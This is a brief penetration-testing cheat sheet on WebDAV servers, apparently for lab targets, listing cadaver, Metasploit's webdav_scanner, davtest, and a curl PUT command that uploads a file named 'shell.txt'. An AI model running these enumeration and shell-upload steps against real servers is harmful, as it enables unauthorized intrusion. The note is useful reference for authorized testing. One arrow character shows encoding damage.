webdav

#cadaver cadaver 10.10.10.10 #curl PUT request curl -T 'shell.txt' 'http://10.10.10.10' #Metasploit use auxiliary/scanner/http/webdav_scanner set path /dav/ set rhosts 10.11.1.14 run POC that target is running webDav extra: Testing file permissions โ†’ davtest #davtest davtest -url http://10.11.1.14/dav

Last updated